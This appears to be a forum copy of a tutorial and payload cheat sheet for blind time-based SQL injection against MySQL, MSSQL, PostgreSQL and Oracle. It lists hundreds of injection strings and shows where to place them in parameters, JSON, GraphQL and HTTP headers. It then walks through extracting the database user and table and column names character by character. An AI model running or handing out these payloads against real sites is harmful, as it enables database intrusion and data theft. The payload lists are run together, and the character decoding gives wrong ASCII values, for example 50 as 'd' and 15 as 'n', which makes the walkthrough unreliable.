Today’s topic is all about Blind SQL injection detection and exploitation.
Time Based (GET,POST,PUT)
Apply on:
SearchFirst name, last name, number, any kind of date, Email or Password (register, login, reset password)Any kind of Product,menu,keyword,paymentCookie,User agent,Referer,X-Forwarded-For
Parameter list (regular):
Payload list:
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Zif(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))XOR''XOR(if(now()=sysdate(),sleep(5*1),0))OR'0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)(select(0)from(select(sleep(5)))v)(SELECT SLEEP(5))'%2b(select*from(select(sleep(5)))a)%2b'(select*from(select(sleep(5)))a)1'%2b(select*from(select(sleep(5)))a)%2b',(select * from (select(sleep(5)))a)desc%2c(select*from(select(sleep(5)))a)-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--1 and sleep 51 and sleep(5)--1 and sleep(5)' and sleep 5--' and sleep 5' and sleep 5 and '1'='1' and sleep(5) and '1'='1' and sleep(5)--' and sleep(5)' AnD SLEEP(5) ANd '1and sleep 5--and sleep 5and sleep(5)--and sleep(5)and SELECT SLEEP(5); #AnD SLEEP(5)AnD SLEEP(5)--AnD SLEEP(5)# and sleep 5-- and sleep 5 and sleep(5)-- and sleep(5) and SELECT SLEEP(5); #' AND SLEEP(5)#" AND SLEEP(5)#') AND SLEEP(5)#OR BLIND
r sleep 5--or sleep 5or sleep(5)--or sleep(5)or SELECT SLEEP(5); #or SLEEP(5)or SLEEP(5)#or SLEEP(5)--or SLEEP(5)="or SLEEP(5)=' or sleep 5-- or sleep 5 or sleep(5)-- or sleep(5) or SELECT SLEEP(5); #' OR SLEEP(5)#" OR SLEEP(5)#') OR SLEEP(5)#You can replace AND / OR1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 13371 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--' RLIKE SLEEP(5)--' RLIKE SLEEP(5)-- 1337" RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5) AND ('1337'='1337')) RLIKE SLEEP(5) AND (('1337'='1337'))) RLIKE SLEEP(5) AND ((('1337'='1337) RLIKE SLEEP(5)-- 1337) RLIKE SLEEP(5) AND (1337=1337)) RLIKE SLEEP(5) AND ((1337=1337))) RLIKE SLEEP(5) AND (((1337=13371 RLIKE SLEEP(5)1 RLIKE SLEEP(5)-- 13371 RLIKE SLEEP(5)# 1337) WHERE 1337=1337 RLIKE SLEEP(5)-- 13371 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' RLIKE SLEEP(5) AND '1337'='1337') RLIKE SLEEP(5) AND ('1337' LIKE '1337')) RLIKE SLEEP(5) AND (('1337' LIKE '1337'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337%' RLIKE SLEEP(5) AND '1337%'='1337' RLIKE SLEEP(5) AND '1337' LIKE '1337") RLIKE SLEEP(5) AND ("1337"="1337")) RLIKE SLEEP(5) AND (("1337"="1337"))) RLIKE SLEEP(5) AND ((("1337"="1337" RLIKE SLEEP(5) AND "1337"="1337") RLIKE SLEEP(5) AND ("1337" LIKE "1337")) RLIKE SLEEP(5) AND (("1337" LIKE "1337"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337" RLIKE SLEEP(5) AND "1337" LIKE "1337' RLIKE SLEEP(5) OR '1337'='1337') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337ELT Blind:You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--' AND ELT(1337=1337,SLEEP(5))-- 1337" AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337) AND ELT(1337=1337,SLEEP(5))-- 1337) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=13371 AND ELT(1337=1337,SLEEP(5))1 AND ELT(1337=1337,SLEEP(5))-- 13371 AND ELT(1337=1337,SLEEP(5))# 1337) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND =BENCHMARK(5000000,MD5(0x774c5341))--') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:5'--';WAITFOR DELAY '0:0:5'--);waitfor delay '0:0:5'--';waitfor delay '0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfor delay '0:0:5'--));waitfor delay '0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--") IF (1=1) WAITFOR DELAY '0:0:5'--';%5waitfor%5delay%5'0:0:5'%5--%5' WAITFOR DELAY '0:0:5'--' WAITFOR DELAY '0:0:5'or WAITFOR DELAY '0:0:5'--or WAITFOR DELAY '0:0:5'and WAITFOR DELAY '0:0:5'--and WAITFOR DELAY '0:0:5'WAITFOR DELAY '0:0:5';WAITFOR DELAY '0:0:5'--;WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'--1 WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'-- 13371' WAITFOR DELAY '0:0:5' AND '1337'='13371') WAITFOR DELAY '0:0:5' AND ('1337'='13371) WAITFOR DELAY '0:0:5' AND (1337=1337') WAITFOR DELAY '0:0:5'--" WAITFOR DELAY '0:0:5'--')) WAITFOR DELAY '0:0:5'--'))) WAITFOR DELAY '0:0:5'--%' WAITFOR DELAY '0:0:5'--") WAITFOR DELAY '0:0:5'--")) WAITFOR DELAY '0:0:5'--"))) WAITFOR DELAY '0:0:5'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(5);;SELECT pg_sleep(5);and SELECT pg_sleep(5);1 SELECT pg_sleep(5);or SELECT pg_sleep(5);(SELECT pg_sleep(5))pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--' or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--pg_SLEEP(5)pg_SLEEP(5)--pg_SLEEP(5)#or pg_SLEEP(5)or pg_SLEEP(5)--or pg_SLEEP(5)#' SELECT pg_sleep(5);or SELECT pg_sleep(5);' SELECT pg_sleep(5);1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 13371' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='13371') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='13371) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
Oracle Blind (Time Based):
You can replace AND / OR
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads:
sleep(5)#(sleep 5)--(sleep 5)(sleep(5))--(sleep(5))-sleep(5)SLEEP(5)#SLEEP(5)--SLEEP(5)="SLEEP(5)='";sleep 5--";sleep 5";sleep(5)--";sleep(5)";SELECT SLEEP(5); #1 SELECT SLEEP(5); #+ SLEEP(5) + '&&SLEEP(5)&&SLEEP(5)--&&SLEEP(5)#;sleep 5--;sleep 5;sleep(5)--;sleep(5);SELECT SLEEP(5); #'&&SLEEP(5)&&'1' SELECT SLEEP(5); #benchmark(50000000,MD5(1))benchmark(50000000,MD5(1))--benchmark(50000000,MD5(1))#or benchmark(50000000,MD5(1))or benchmark(50000000,MD5(1))--or benchmark(50000000,MD5(1))#ORDER BY SLEEP(5)ORDER BY SLEEP(5)--ORDER BY SLEEP(5)#AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RANDOMBLOB(500000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))RANDOMBLOB(1000000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If response delay between 5 to 7 Seconds .It means vulnerable.
Detection and exploitation:
1.=payload
Example:
=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z=(select(0)from(select(sleep(5)))v)email=test@gmail.com' WAITFOR DELAY '0:0:5'--email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
2.=value payload
Example:
=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='=1'XOR(if(now()=sysdate(),sleep(5),0))OR'=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337 =1 or sleep(5)#
Mysql blind sql injection (time based):
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
[IMG]https://miro.medium.com/v2/resize:fit:700/1*D9i4iyfJ62mnQeOtPfsAWg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*EwylY6hqMBpTJXRq8BLgTA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:392/1*UWGw-50xZC3wRYg_dklGPA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*S4Bb8Nleps-hoSUdu9w5oA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*PCaJrmljJDXWdIqU3GA9FQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*urhLRTDBPrpdukkcaelt2Q.jpeg[/IMG]
MSSQL blind Sql injection (time based):
email=test@gmail.com' WAITFOR DELAY '0:0:5'--
[IMG]https://miro.medium.com/v2/resize:fit:700/1*CdNLKLDfXfpECqwOr6Ecfg.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*cErDfVAS9BHyLBOIOzav2Q.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*XinsHBIpDcqZ6xj6HC1-Bg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*-S9Is3nbZTUkri6wR588kQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*JRRt82kcpPa1vXP8zMdpGw.jpeg[/IMG]
3.https://redact.com/page/payloadhttps://redact.com/page/value payload
Example:
You must be logged in to see this link."XOR(if(now()=sysdate(),sleep(3),0))OR"/https://redact.com/(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"You must be logged in to see this link. AnD SLEEP(5)You must be logged in to see this link.' ORDER BY SLEEP(5)
[IMG]https://miro.medium.com/v2/resize:fit:700/1*MX6EySiEHrusRBDdBk2NMA.jpeg[/IMG]
4.Blind Sql injection in json:
{payload}
[payload]
{value payload}
Example:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]{AnD SLEEP(5)}{1 AnD SLEEP(5)}{1' AnD SLEEP(5)--}{sleep 5}"emails":["AnD SLEEP(5)"]"emails":["test@gmail.com' OR SLEEP(5)#"]{"options":{"id":[],"emails":["AnD SLEEP(5)"],
5.Blind Sql injection in Graphql:
{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
6.Http header based (Error based,Time Based):
Referer: https://https://redact.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://https://redact.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: paylaod
Mysql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*u9-N09vB98GeqnEuLqPQCQ.jpeg[/IMG]
Mysql Error Based
Mssql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*QkLcrAGYZARVxDv_jBArYg.jpeg[/IMG]
Mssql Error Based
7.Blind Sql injection exploitation (Manual):
MySql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1-SLEEP(5)RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)Time Based Sqli:1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#Error Blind SQLi:AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -Ultimate Sql injection Payload:SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"Exploitation:redact.com/page/search?q=1 and sleep(5)--Current user:redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--Table_name guessing:redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--Mssql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'RESULTING QUERY (VERIFY IF USER IS SA).SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'Exploitation:You must be logged in to see this link. WAITFOR DELAY '00:00:5'-- (+5 seconds)TIME-BASED Extraction of CURRENT DATABASE USERDetermine Length of USER:You must be logged in to see this link. IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = 5 characters in lengthDetermine length, and then try to find out CHAR value one character position at a time, like this:You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the first character CHAR value is 97 which is an "a"You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the second character CHAR value is 50 which is a "d"You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—Result = third character CHAR value is 59 which is the letter "m"You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the fourth character CHAR value is 55 which is an "i"You must be logged in to see this link. IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)the fifth character position has CHAR value of 15 which is the letter "n"Database User = 97,50,59,55,15 = adminTIME-BASED Extraction of 1st TABLE COLUMNS:let’s enumerate some columns from the table(s) we found:You must be logged in to see this link. IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)You can check the length before you start testing awayhttp://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF 